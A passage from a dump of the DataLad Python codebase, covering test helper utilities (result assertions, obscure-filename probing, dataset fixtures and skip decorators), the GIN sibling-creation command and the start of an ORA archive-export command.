in:\\n{}'.format(\n i + 1,\n len(results),\n label,\n dumps(results, indent=1, default=lambda x: str(x))))\n\n\ndef assert_message(message, results):\n \"\"\"Verify that each status dict in the results has a message\n\n This only tests the message template string, and not a formatted message\n with args expanded.\n \"\"\"\n\n results = ensure_result_list(results)\n if len(results) == 0:\n # If there are no results, an assertion about all results must fail.\n raise AssertionError(\"No results retrieved\")\n\n for r in results:\n assert_in('message', r)\n m = r['message'][0] if isinstance(r['message'], tuple) else r['message']\n assert_equal(m, message)\n\n\ndef _format_res(x):\n return textwrap.indent(\n dumps(x, indent=1, default=str, sort_keys=True),\n prefix=\" \")\n\n\ndef assert_result_count(results, n, **kwargs):\n \"\"\"Verify specific number of results (matching criteria, if any)\"\"\"\n count = 0\n results = ensure_result_list(results)\n for r in results:\n if not len(kwargs):\n count += 1\n elif all(k in r and r[k] == v for k, v in kwargs.items()):\n count += 1\n if not n == count:\n raise AssertionError(\n 'Got {} instead of {} expected results matching\\n{}\\nInspected {} record(s):\\n{}'.format(\n count,\n n,\n _format_res(kwargs),\n len(results),\n _format_res(results)))\n\n\ndef _check_results_in(should_contain, results, **kwargs):\n results = ensure_result_list(results)\n found = False\n for r in results:\n if all(k in r and r[k] == v for k, v in kwargs.items()):\n found = True\n break\n if found ^ should_contain:\n if should_contain:\n msg = \"Desired result\\n{}\\nnot found among\\n{}\"\n else:\n msg = \"Result\\n{}\\nunexpectedly found among\\n{}\"\n raise AssertionError(msg.format(_format_res(kwargs),\n _format_res(results)))\n\n\ndef assert_in_results(results, **kwargs):\n \"\"\"Verify that the particular combination of keys and values is found in\n one of the results\"\"\"\n _check_results_in(True, results, **kwargs)\n\n\ndef assert_not_in_results(results, **kwargs):\n \"\"\"Verify that the particular combination of keys and values is not in any\n of the results\"\"\"\n _check_results_in(False, results, **kwargs)\n\n\ndef assert_result_values_equal(results, prop, values):\n \"\"\"Verify that the values of all results for a given key in the status dicts\n match the given sequence\"\"\"\n results = 
ensure_result_list(results)\n assert_equal(\n [r[prop] for r in results],\n values)\n\n\ndef assert_result_values_cond(results, prop, cond):\n \"\"\"Verify that the values of all results for a given key in the status dicts\n fulfill condition `cond`.\n\n Parameters\n ----------\n results:\n prop: str\n cond: callable\n \"\"\"\n results = ensure_result_list(results)\n for r in results:\n ok_(cond(r[prop]),\n msg=\"r[{prop}]: {value}\".format(prop=prop, value=r[prop]))\n\n\ndef ignore_nose_capturing_stdout(func):\n \"\"\"DEPRECATED and will be removed soon. Does nothing!\n\n Originally was intended as a decorator workaround for nose's behaviour\n with redirecting sys.stdout, but now we monkey patch nose now so no test\n should no longer be skipped.\n\n See issue reported here:\n https://code.google.com/p/python-nose/issues/detail?id=243&can=1&sort=-id&colspec=ID%20Type%20Status%20Priority%20Stars%20Milestone%20Owner%20Summary\n\n \"\"\"\n lgr.warning(\n \"@ignore_nose_capturing_stdout no longer does anything - nose should \"\n \"just be monkey patched in setup_package. %s still has it\",\n func.__name__\n )\n return func\n\n\n# Helper to run parametric test with possible combinations of batch and direct\nwith_parametric_batch = pytest.mark.parametrize(\"batch\", [False, True])\n\n\n# List of most obscure filenames which might or not be supported by different\n# filesystems across different OSs. Start with the most obscure\nOBSCURE_PREFIX = os.getenv('DATALAD_TESTS_OBSCURE_PREFIX', '')\n# Those will be tried to be added to the base name if filesystem allows\nOBSCURE_FILENAME_PARTS = [' ', '/', '|', ';', '&', '%b5', '{}', \"'\", '\"', '<', '>']\nUNICODE_FILENAME = u\"ΔЙקم๗あ\"\n\n# OSX is exciting -- some I guess FS might be encoding differently from decoding\n# so Й might get recoded\n# (ref: https://github.com/datalad/datalad/pull/1921#issuecomment-385809366)\nif sys.getfilesystemencoding().lower() == 'utf-8':\n if on_osx:\n # TODO: figure it really out\n UNICODE_FILENAME = UNICODE_FILENAME.replace(u\"Й\", u\"\")\n if on_windows:\n # TODO: really figure out unicode handling on windows\n UNICODE_FILENAME = ''\n if UNICODE_FILENAME:\n OBSCURE_FILENAME_PARTS.append(UNICODE_FILENAME)\n# space before extension, simple extension and trailing space to finish it up\nOBSCURE_FILENAME_PARTS += [' ', '.datc', ' ']\n\n\n@with_tempfile(mkdir=True)\ndef get_most_obscure_supported_name(tdir, return_candidates=False):\n \"\"\"Return the most obscure filename that the filesystem would support under TEMPDIR\n\n Parameters\n ----------\n return_candidates: bool, optional\n if True, return a tuple of (good, candidates) where candidates are \"partially\"\n sorted from trickiest considered\n TODO: we might want to use it as a function where we would provide tdir\n \"\"\"\n # we need separate good_base so we do not breed leading/trailing spaces\n initial = good = OBSCURE_PREFIX\n system = platform.system()\n\n OBSCURE_FILENAMES = []\n def good_filename(filename):\n OBSCURE_FILENAMES.append(candidate)\n try:\n # Windows seems to not tollerate trailing spaces and\n # ATM we do not distinguish obscure filename and dirname.\n # So here we will test for both - being able to create dir\n # with obscure name and obscure filename under\n os.mkdir(opj(tdir, filename))\n with open(opj(tdir, filename, filename), 'w') as f:\n f.write(\"TEST LOAD\")\n return True\n except:\n lgr.debug(\"Filename %r is not supported on %s under %s\",\n filename, system, tdir)\n return False\n\n # incrementally build up the most obscure filename 
from parts\n for part in OBSCURE_FILENAME_PARTS:\n candidate = good + part\n if good_filename(candidate):\n good = candidate\n\n if good == initial:\n raise RuntimeError(\"Could not create any of the files under %s among %s\"\n % (tdir, OBSCURE_FILENAMES))\n lgr.debug(\"Tested %d obscure filename candidates. The winner: %r\", len(OBSCURE_FILENAMES), good)\n if return_candidates:\n return good, OBSCURE_FILENAMES[::-1]\n else:\n return good\n\n\nOBSCURE_FILENAME, OBSCURE_FILENAMES = get_most_obscure_supported_name(return_candidates=True)\n\n\n@optional_args\ndef with_testsui(t, responses=None, interactive=True):\n \"\"\"Switch main UI to be 'tests' UI and possibly provide answers to be used\"\"\"\n\n @wraps(t)\n def _wrap_with_testsui(*args, **kwargs):\n from datalad.ui import ui\n old_backend = ui.backend\n try:\n ui.set_backend('tests' if interactive else 'tests-noninteractive')\n if responses:\n ui.add_responses(responses)\n ret = t(*args, **kwargs)\n if responses:\n responses_left = ui.get_responses()\n assert not len(responses_left), \"Some responses were left not used: %s\" % str(responses_left)\n return ret\n finally:\n ui.set_backend(old_backend)\n\n if not interactive and responses is not None:\n raise ValueError(\"Non-interactive UI cannot provide responses\")\n\n return _wrap_with_testsui\n\nwith_testsui.__test__ = False\n\n\ndef assert_no_errors_logged(func, skip_re=None):\n \"\"\"Decorator around function to assert that no errors logged during its execution\"\"\"\n @wraps(func)\n def _wrap_assert_no_errors_logged(*args, **kwargs):\n with swallow_logs(new_level=logging.ERROR) as cml:\n out = func(*args, **kwargs)\n if cml.out:\n if not (skip_re and re.search(skip_re, cml.out)):\n raise AssertionError(\n \"Expected no errors to be logged, but log output is %s\"\n % cml.out\n )\n return out\n\n return _wrap_assert_no_errors_logged\n\n\ndef get_mtimes_and_digests(target_path):\n \"\"\"Return digests (md5) and mtimes for all the files under target_path\"\"\"\n from datalad.support.digests import Digester\n from datalad.utils import find_files\n digester = Digester(['md5'])\n\n # bother only with existing ones for this test, i.e. skip annexed files without content\n target_files = [\n f for f in find_files('.*', topdir=target_path, exclude_vcs=False, exclude_datalad=False)\n if exists(f)\n ]\n # let's leave only relative paths for easier analysis\n target_files_ = [relpath(f, target_path) for f in target_files]\n\n digests = {frel: digester(f) for f, frel in zip(target_files, target_files_)}\n mtimes = {frel: os.stat(f).st_mtime for f, frel in zip(target_files, target_files_)}\n return digests, mtimes\n\n\ndef get_datasets_topdir():\n \"\"\"Delayed parsing so it could be monkey patched etc\"\"\"\n from datalad.consts import DATASETS_TOPURL\n return RI(DATASETS_TOPURL).hostname\n\n\ndef assert_repo_status(path, annex=None, untracked_mode='normal', **kwargs):\n \"\"\"Compare a repo status against (optional) exceptions.\n\n Anything file/directory that is not explicitly indicated must have\n state 'clean', i.e. no modifications and recorded in Git.\n\n Parameters\n ----------\n path: str or Repo\n in case of a str: path to the repository's base dir;\n Note, that passing a Repo instance prevents detecting annex. 
This might\n be useful in case of a non-initialized annex, a GitRepo is pointing to.\n annex: bool or None\n explicitly set to True or False to indicate, that an annex is (not)\n expected; set to None to autodetect, whether there is an annex.\n Default: None.\n untracked_mode: {'no', 'normal', 'all'}\n If and how untracked content is reported. The specification of untracked\n files that are OK to be found must match this mode. See `Repo.status()`\n **kwargs\n Files/directories that are OK to not be in 'clean' state. Each argument\n must be one of 'added', 'untracked', 'deleted', 'modified' and each\n value must be a list of filenames (relative to the root of the\n repository, in POSIX convention).\n \"\"\"\n r = None\n if isinstance(path, AnnexRepo):\n if annex is None:\n annex = True\n # if `annex` was set to False, but we find an annex => fail\n assert_is(annex, True)\n r = path\n elif isinstance(path, GitRepo):\n if annex is None:\n annex = False\n # explicitly given GitRepo instance doesn't make sense with\n # 'annex' True\n assert_is(annex, False)\n r = path\n else:\n # 'path' is an actual path\n try:\n r = AnnexRepo(path, init=False, create=False)\n if annex is None:\n annex = True\n # if `annex` was set to False, but we find an annex => fail\n assert_is(annex, True)\n except Exception:\n # Instantiation failed => no annex\n try:\n r = GitRepo(path, init=False, create=False)\n except Exception:\n raise AssertionError(\"Couldn't find an annex or a git \"\n \"repository at {}.\".format(path))\n if annex is None:\n annex = False\n # explicitly given GitRepo instance doesn't make sense with\n # 'annex' True\n assert_is(annex, False)\n\n status = r.status(untracked=untracked_mode)\n # for any file state that indicates some kind of change (all but 'clean)\n for state in ('added', 'untracked', 'deleted', 'modified'):\n oktobefound = sorted(r.pathobj.joinpath(ut.PurePosixPath(p))\n for p in kwargs.get(state, []))\n state_files = sorted(k for k, v in status.items()\n if v.get('state', None) == state)\n eq_(state_files, oktobefound,\n 'unexpected content of state \"%s\": %r != %r'\n % (state, state_files, oktobefound))\n\n\ndef get_convoluted_situation(path, repocls=AnnexRepo):\n from datalad.api import create\n ckwa = dict(result_renderer='disabled')\n\n #if 'APPVEYOR' in os.environ:\n # # issue only happens on appveyor, Python itself implodes\n # # cannot be reproduced on a real windows box\n # pytest.skip(\n # 'get_convoluted_situation() causes appveyor to crash, '\n # 'reason unknown')\n repo = repocls(path, create=True)\n # use create(force) to get an ID and config into the empty repo\n # Pass explicit `annex` to ensure that GitRepo does get .noannex\n ds = Dataset(path).create(force=True, annex=repocls is AnnexRepo, **ckwa)\n # base content\n create_tree(\n ds.path,\n {\n '.gitignore': '*.ignored',\n 'subdir': {\n 'file_clean': 'file_clean',\n 'file_deleted': 'file_deleted',\n 'file_modified': 'file_clean',\n },\n 'subdir-only-ignored': {\n '1.ignored': '',\n },\n 'file_clean': 'file_clean',\n 'file_deleted': 'file_deleted',\n 'file_staged_deleted': 'file_staged_deleted',\n 'file_modified': 'file_clean',\n }\n )\n if isinstance(ds.repo, AnnexRepo):\n create_tree(\n ds.path,\n {\n 'subdir': {\n 'file_dropped_clean': 'file_dropped_clean',\n },\n 'file_dropped_clean': 'file_dropped_clean',\n }\n )\n ds.save(**ckwa)\n if isinstance(ds.repo, AnnexRepo):\n # some files straight in git\n create_tree(\n ds.path,\n {\n 'subdir': {\n 'file_ingit_clean': 'file_ingit_clean',\n 'file_ingit_modified': 
'file_ingit_clean',\n },\n 'file_ingit_clean': 'file_ingit_clean',\n 'file_ingit_modified': 'file_ingit_clean',\n }\n )\n ds.save(to_git=True, **ckwa)\n ds.drop([\n 'file_dropped_clean',\n opj('subdir', 'file_dropped_clean')],\n reckless='kill', **ckwa)\n # clean and proper subdatasets\n ds.create('subds_clean', **ckwa)\n ds.create(opj('subdir', 'subds_clean'), **ckwa)\n ds.create('subds_unavailable_clean', **ckwa)\n ds.create(opj('subdir', 'subds_unavailable_clean'), **ckwa)\n # uninstall some subdatasets (still clean)\n ds.drop([\n 'subds_unavailable_clean',\n opj('subdir', 'subds_unavailable_clean')],\n what='all', reckless='kill', recursive=True, **ckwa)\n assert_repo_status(ds.path)\n # make a dirty subdataset\n ds.create('subds_modified', **ckwa)\n ds.create(opj('subds_modified', 'someds'), **ckwa)\n ds.create(opj('subds_modified', 'someds', 'dirtyds'), **ckwa)\n # make a subdataset with additional commits\n ds.create(opj('subdir', 'subds_modified'), **ckwa)\n pdspath = opj(ds.path, 'subdir', 'subds_modified', 'progressedds')\n ds.create(pdspath, **ckwa)\n create_tree(\n pdspath,\n {'file_clean': 'file_ingit_clean'}\n )\n Dataset(pdspath).save(**ckwa)\n assert_repo_status(pdspath)\n # staged subds, and files\n create(opj(ds.path, 'subds_added'), **ckwa)\n # use internal helper to get subdataset into an 'added' state\n # that would not happen in standard datalad workflows\n list(ds.repo._save_add_submodules([ds.pathobj / 'subds_added']))\n create(opj(ds.path, 'subdir', 'subds_added'), **ckwa)\n list(ds.repo._save_add_submodules([ds.pathobj / 'subdir' / 'subds_added']))\n # some more untracked files\n create_tree(\n ds.path,\n {\n 'subdir': {\n 'file_untracked': 'file_untracked',\n 'file_added': 'file_added',\n },\n 'file_untracked': 'file_untracked',\n 'file_added': 'file_added',\n 'dir_untracked': {\n 'file_untracked': 'file_untracked',\n },\n 'subds_modified': {\n 'someds': {\n \"dirtyds\": {\n 'file_untracked': 'file_untracked',\n },\n },\n },\n }\n )\n ds.repo.add(['file_added', opj('subdir', 'file_added')])\n # untracked subdatasets\n create(opj(ds.path, 'subds_untracked'), **ckwa)\n create(opj(ds.path, 'subdir', 'subds_untracked'), **ckwa)\n # deleted files\n os.remove(opj(ds.path, 'file_deleted'))\n os.remove(opj(ds.path, 'subdir', 'file_deleted'))\n # staged deletion\n ds.repo.remove('file_staged_deleted')\n # modified files\n if isinstance(ds.repo, AnnexRepo):\n ds.repo.unlock(['file_modified', opj('subdir', 'file_modified')])\n create_tree(\n ds.path,\n {\n 'subdir': {\n 'file_ingit_modified': 'file_ingit_modified',\n },\n 'file_ingit_modified': 'file_ingit_modified',\n }\n )\n create_tree(\n ds.path,\n {\n 'subdir': {\n 'file_modified': 'file_modified',\n },\n 'file_modified': 'file_modified',\n }\n )\n return ds\n\n\ndef get_deeply_nested_structure(path):\n \"\"\" Here is what this does (assuming UNIX, locked):\n | .\n | ├── directory_untracked\n | │ └── link2dir -> ../subdir\n | ├── OBSCURE_FILENAME_file_modified\n | ├── link2dir -> subdir\n | ├── link2subdsdir -> subds_modified/subdir\n | ├── link2subdsroot -> subds_modified\n | ├── subdir\n | │ ├── annexed_file.txt -> ../.git/annex/objects/...\n | │ ├── file_modified\n | │ ├── git_file.txt\n | │ └── link2annex_files.txt -> annexed_file.txt\n | └── subds_modified\n | ├── link2superdsdir -> ../subdir\n | ├── subdir\n | │ └── annexed_file.txt -> ../.git/annex/objects/...\n | └── subds_lvl1_modified\n | └── OBSCURE_FILENAME_directory_untracked\n | └── untracked_file\n\n When a system has no symlink support, the link2... 
components are not\n included.\n \"\"\"\n ds = Dataset(path).create()\n (ds.pathobj / 'subdir').mkdir()\n (ds.pathobj / 'subdir' / 'annexed_file.txt').write_text(u'dummy')\n ds.save()\n (ds.pathobj / 'subdir' / 'git_file.txt').write_text(u'dummy')\n ds.save(to_git=True)\n # a subtree of datasets\n subds = ds.create('subds_modified')\n # another dataset, plus an additional dir in it\n ds.create(opj('subds_modified', 'subds_lvl1_modified'))\n create_tree(\n ds.path,\n {\n 'subdir': {\n 'file_modified': 'file_modified',\n },\n OBSCURE_FILENAME + u'file_modified_': 'file_modified',\n }\n )\n create_tree(\n str(ds.pathobj / 'subds_modified' / 'subds_lvl1_modified'),\n {OBSCURE_FILENAME + u'_directory_untracked': {\"untracked_file\": \"\"}}\n )\n (ut.Path(subds.path) / 'subdir').mkdir()\n (ut.Path(subds.path) / 'subdir' / 'annexed_file.txt').write_text(u'dummy')\n subds.save()\n (ds.pathobj / 'directory_untracked').mkdir()\n\n if not has_symlink_capability():\n return ds\n\n # symlink farm #1\n # symlink to annexed file\n (ds.pathobj / 'subdir' / 'link2annex_files.txt').symlink_to(\n 'annexed_file.txt')\n # symlink to directory within the dataset\n (ds.pathobj / 'link2dir').symlink_to('subdir')\n # upwards pointing symlink to directory within the same dataset\n (ds.pathobj / 'directory_untracked' / 'link2dir').symlink_to(\n opj('..', 'subdir'))\n # symlink pointing to a subdataset mount in the same dataset\n (ds.pathobj / 'link2subdsroot').symlink_to('subds_modified')\n # symlink to a dir in a subdataset (across dataset boundaries)\n (ds.pathobj / 'link2subdsdir').symlink_to(\n opj('subds_modified', 'subdir'))\n # symlink to a dir in a superdataset (across dataset boundaries)\n (ut.Path(subds.path) / 'link2superdsdir').symlink_to(\n opj('..', 'subdir'))\n return ds\n\n\ndef maybe_adjust_repo(repo):\n \"\"\"Put repo into an adjusted branch if it is not already.\n \"\"\"\n if not repo.is_managed_branch():\n repo.call_annex([\"upgrade\"])\n repo.config.reload(force=True)\n repo.adjust()\n\n\n@with_tempfile\n@with_tempfile\ndef has_symlink_capability(p1, p2):\n\n path = ut.Path(p1)\n target = ut.Path(p2)\n return utils.check_symlink_capability(path, target)\n\n\ndef skip_wo_symlink_capability(func):\n \"\"\"Skip test when environment does not support symlinks\n\n Perform a behavioral test instead of top-down logic, as on\n windows this could be on or off on a case-by-case basis.\n \"\"\"\n @wraps(func)\n @attr('skip_wo_symlink_capability')\n def _wrap_skip_wo_symlink_capability(*args, **kwargs):\n if not has_symlink_capability():\n pytest.skip(\"no symlink capabilities\")\n return func(*args, **kwargs)\n return _wrap_skip_wo_symlink_capability\n\n\n_TESTS_ADJUSTED_TMPDIR = None\n\n\ndef skip_if_adjusted_branch(func):\n \"\"\"Skip test if adjusted branch is used by default on TMPDIR file system.\n \"\"\"\n @wraps(func)\n @attr('skip_if_adjusted_branch')\n def _wrap_skip_if_adjusted_branch(*args, **kwargs):\n global _TESTS_ADJUSTED_TMPDIR\n if _TESTS_ADJUSTED_TMPDIR is None:\n @with_tempfile\n def _check(path):\n ds = Dataset(path).create(force=True)\n return ds.repo.is_managed_branch()\n _TESTS_ADJUSTED_TMPDIR = _check()\n\n if _TESTS_ADJUSTED_TMPDIR:\n pytest.skip(\"Test incompatible with adjusted branch default\")\n return func(*args, **kwargs)\n return _wrap_skip_if_adjusted_branch\n\n\ndef get_ssh_port(host):\n \"\"\"Get port of `host` in ssh_config.\n\n Our tests depend on the host being defined in ssh_config, including its\n port. 
This method can be used by tests that want to check handling of an\n explicitly specified\n\n Note that if `host` does not match a host in ssh_config, the default value\n of 22 is returned.\n\n Skips test if port cannot be found.\n\n Parameters\n ----------\n host : str\n\n Returns\n -------\n port (int)\n \"\"\"\n out = ''\n runner = WitlessRunner()\n try:\n res = runner.run([\"ssh\", \"-G\", host], protocol=StdOutErrCapture)\n out = res[\"stdout\"]\n err = res[\"stderr\"]\n except Exception as exc:\n err = str(exc)\n\n port = None\n for line in out.splitlines():\n if line.startswith(\"port \"):\n try:\n port = int(line.split()[1])\n except Exception as exc:\n err = str(exc)\n break\n\n if port is None:\n pytest.skip(\"port for {} could not be determined: {}\"\n .format(host, err))\n return port\n\n\n#\n# Context Managers\n#\n\n\ndef patch_config(vars):\n \"\"\"Patch our config with custom settings. Returns mock.patch cm\n\n Only the merged configuration from all sources (global, local, dataset)\n will be patched. Source-constrained patches (e.g. only committed dataset\n configuration) are not supported.\n \"\"\"\n return patch.dict(dl_cfg._merged_store, vars)\n\n\n@contextmanager\ndef set_date(timestamp):\n \"\"\"Temporarily override environment variables for git/git-annex dates.\n\n Parameters\n ----------\n timestamp : int\n Unix timestamp.\n \"\"\"\n git_ts = \"@{} +0000\".format(timestamp)\n with patch.dict(\"os.environ\",\n {\"GIT_COMMITTER_DATE\": git_ts,\n \"GIT_AUTHOR_DATE\": git_ts,\n \"GIT_ANNEX_VECTOR_CLOCK\": str(timestamp),\n \"DATALAD_FAKE__DATES\": \"0\"}):\n yield\n\n\n@contextmanager\ndef set_annex_version(version):\n \"\"\"Override the git-annex version.\n\n This temporarily masks the git-annex version present in external_versions\n and make AnnexRepo forget its cached version information.\n \"\"\"\n from datalad.support.annexrepo import AnnexRepo\n ar_vers = AnnexRepo.git_annex_version\n with patch.dict(\n \"datalad.support.annexrepo.external_versions._versions\",\n {\"cmd:annex\": version}):\n try:\n AnnexRepo.git_annex_version = None\n yield\n finally:\n AnnexRepo.git_annex_version = ar_vers\n\n#\n# Test tags\n#\n# To be explicit, and not \"loose\" some tests due to typos, decided to make\n# explicit decorators for common types\n\n\ndef integration(f):\n \"\"\"Mark test as an \"integration\" test which generally is not needed to be run\n \n Generally tend to be slower.\n Should be used in combination with @slow and @turtle if that is the case.\n \"\"\"\n return attr('integration')(f)\n\n\ndef slow(f):\n \"\"\"Mark test as a slow, although not necessarily integration or usecase test\n\n Rule of thumb cut-off to mark as slow is 10 sec\n \"\"\"\n return attr('slow')(f)\n\n\ndef turtle(f):\n \"\"\"Mark test as very slow, meaning to not run it on Travis due to its\n time limit\n\n Rule of thumb cut-off to mark as turtle is 2 minutes\n \"\"\"\n return attr('turtle')(f)\n\n\ndef usecase(f):\n \"\"\"Mark test as a usecase user ran into and which (typically) caused bug report\n to be filed/troubleshooted\n\n Should be used in combination with @slow and @turtle if slow.\n \"\"\"\n return attr('usecase')(f)\n" }, { "alpha_fraction": 0.581498384475708, "alphanum_fraction": 0.5830217599868774, "avg_line_length": 40.5, "blob_id": "e710e2b29327ca299bd54483f402c1ca61f230c2", "content_id": "6cf73b49d223fb727367ff568225eff458afa406", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7221, "license_type": 
"permissive", "max_line_length": 88, "num_lines": 174, "path": "/datalad/distributed/create_sibling_gin.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for creating a publication target on a GIN instance\n\"\"\"\n\nimport logging\n\nfrom datalad.distributed.create_sibling_ghlike import _create_sibling\nfrom datalad.distributed.create_sibling_gogs import _GOGS\nfrom datalad.distribution.dataset import (\n datasetmethod,\n Dataset,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.support.annexrepo import AnnexRepo\n\n\nlgr = logging.getLogger('datalad.distributed.create_sibling_gin')\n\n\nclass _GIN(_GOGS):\n \"\"\"Customizations for GIN as a GH-like platform\n \"\"\"\n name = 'gin'\n fullname = 'GIN'\n response_code_unauthorized = 401\n\n def normalize_repo_properties(self, response):\n \"\"\"Normalize the essential response properties for the result record\n \"\"\"\n return dict(\n reponame=response.get('name'),\n private=response.get('private'),\n # GIN reports the SSH URL as 'clone_url', but we need\n # a HTML URL (without .git suffix) for setting up a\n # type-git special remote (if desired)\n clone_url=response.get('html_url'),\n ssh_url=response.get('ssh_url'),\n html_url=response.get('html_url'),\n )\n\n\n@build_doc\nclass CreateSiblingGin(Interface):\n \"\"\"Create a dataset sibling on a GIN site (with content hosting)\n\n GIN (G-Node infrastructure) is a free data management system. It is a\n GitHub-like, web-based repository store and provides fine-grained access\n control to shared data. GIN is built on Git and git-annex, and can natively\n host DataLad datasets, including their data content!\n\n This command uses the main GIN instance at https://gin.g-node.org as the\n default target, but other deployments can be used via the 'api'\n parameter.\n\n An SSH key, properly registered at the GIN instance, is required for data\n upload via DataLad. Data download from public projects is also possible via\n anonymous HTTP.\n\n In order to be able to use this command, a personal access token has to be\n generated on the platform (Account->Your Settings->Applications->Generate\n New Token).\n\n This command can be configured with\n \"datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE\" in\n order to add any local KEY = VALUE configuration to the created sibling in\n the local `.git/config` file. NETLOC is the domain of the Gin instance to\n apply the configuration for.\n This leads to a behavior that is equivalent to calling datalad's\n ``siblings('configure', ...)``||``siblings configure`` command with the\n respective KEY-VALUE pair after creating the sibling.\n The configuration, like any other, could be set at user- or system level, so\n users do not need to add this configuration to every sibling created with\n the service at NETLOC themselves.\n\n .. 
versionadded:: 0.16\n \"\"\"\n\n _examples_ = [\n dict(text=\"Create a repo 'myrepo' on GIN and register it as sibling \"\n \"'mygin'\",\n code_py=\"create_sibling_gin('myrepo', name='mygin', dataset='.')\",\n code_cmd=\"datalad create-sibling-gin myrepo -s mygin\"),\n dict(text=\"Create private repos with name(-prefix) 'myrepo' on GIN \"\n \"for a dataset and all its present subdatasets\",\n code_py=\"create_sibling_gin('myrepo', dataset='.', \"\n \"recursive=True, private=True)\",\n code_cmd=\"datalad create-sibling-gin myrepo -r --private\"),\n dict(text=\"Create a sibling repo on GIN, and register it as a \"\n \"common data source in the dataset that is available \"\n \"regardless of whether the dataset was directly cloned \"\n \"from GIN\",\n code_py=\"\"\"\\\n > ds = Dataset('.')\n > ds.create_sibling_gin('myrepo', name='gin')\n # first push creates git-annex branch remotely and obtains annex UUID\n > ds.push(to='gin')\n > ds.siblings('configure', name='gin', as_common_datasrc='gin-storage')\n # announce availability (redo for other siblings)\n > ds.push(to='gin')\n \"\"\",\n code_cmd=\"\"\"\\\n % datalad create-sibling-gin myrepo -s gin\n # first push creates git-annex branch remotely and obtains annex UUID\n % datalad push --to gin\n % datalad siblings configure -s gin --as-common-datasrc gin-storage\n # announce availability (redo for other siblings)\n % datalad push --to gin\n \"\"\",\n ),\n ]\n\n _params_ = _GIN.create_sibling_params\n _params_['api']._doc = \"\"\"\\\n URL of the GIN instance without an 'api/<version>' suffix\"\"\"\n\n @staticmethod\n @datasetmethod(name='create_sibling_gin')\n @eval_results\n def __call__(\n reponame,\n *,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n name='gin',\n existing='error',\n api='https://gin.g-node.org',\n credential=None,\n access_protocol='https-ssh',\n publish_depends=None,\n private=False,\n description=None,\n dry_run=False):\n\n for res in _create_sibling(\n platform=_GIN(api, credential, require_token=not dry_run),\n reponame=reponame,\n dataset=dataset,\n recursive=recursive,\n recursion_limit=recursion_limit,\n name=name,\n existing=existing,\n access_protocol=access_protocol,\n publish_depends=publish_depends,\n private=private,\n description=description,\n dry_run=dry_run):\n if res.get('action') == 'configure-sibling' \\\n and res.get('annex-ignore') in ('true', True):\n # when we see that git-annex had disabled access to GIN\n # we will revert it for any dataset with an annex.\n # git-annex's conclusion might solely be based on the\n # fact that it tested prior the first push (failed to\n # obtain a git-annex branch with a UUID) and concluded\n # that there can never be an annex.\n # however, we know for sure that GIN can do it, so we\n # force this to enable correct subsequent data transfer\n ds = Dataset(res['path'])\n if isinstance(ds.repo, AnnexRepo):\n ds.config.set(f'remote.{name}.annex-ignore', 'false',\n scope='local')\n res['annex-ignore'] = 'false'\n yield res\n" }, { "alpha_fraction": 0.528478741645813, "alphanum_fraction": 0.5322896242141724, "avg_line_length": 34.30545425415039, "blob_id": "13b933a15cfab354ac33edb949f7fd1028415e40", "content_id": "b4aefebcf838ee9457e3eb16235c23f8f397857a", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9709, "license_type": "permissive", "max_line_length": 106, "num_lines": 275, "path": "/datalad/distributed/export_archive_ora.py", "repo_name": "datalad/datalad", "src_encoding": 
"UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Export an archive of a local annex object store, suitable for an ORA remote\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport os\nimport os.path as op\nimport shutil\nimport subprocess\nfrom argparse import REMAINDER\n\nfrom datalad.utils import (\n ensure_list,\n rmtree,\n)\nfrom datalad.interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom datalad.interface.results import (\n get_status_dict,\n)\nfrom datalad.support.param import Parameter\nfrom datalad.support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.distribution.dataset import (\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n)\nfrom datalad.log import log_progress\n\nlgr = logging.getLogger('datalad.customremotes.export_archive_ora')\n\n\n@build_doc\nclass ExportArchiveORA(Interface):\n \"\"\"Export an archive of a local annex object store for the ORA remote.\n\n Keys in the local annex object store are reorganized in a temporary\n directory (using links to avoid storage duplication) to use the\n 'hashdirlower' setup used by git-annex for bare repositories and\n the directory-type special remote. This alternative object store is\n then moved into a 7zip archive that is suitable for use in a\n ORA remote dataset store. Placing such an archive into::\n\n <dataset location>/archives/archive.7z\n\n Enables the ORA special remote to locate and retrieve all keys contained\n in the archive.\n \"\"\"\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"specify the dataset to process. If\n no dataset is given, an attempt is made to identify the dataset\n based on the current working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n target=Parameter(\n args=(\"target\",),\n metavar=\"TARGET\",\n doc=\"\"\"if an existing directory, an 'archive.7z' is placed into\n it, otherwise this is the path to the target archive\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n remote=Parameter(\n args=(\"--for\",),\n dest=\"remote\",\n metavar='LABEL',\n doc=\"\"\"name of the target sibling, wanted/preferred settings\n will be used to filter the files added to the archives\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n annex_wanted=Parameter(\n args=(\"--annex-wanted\",),\n 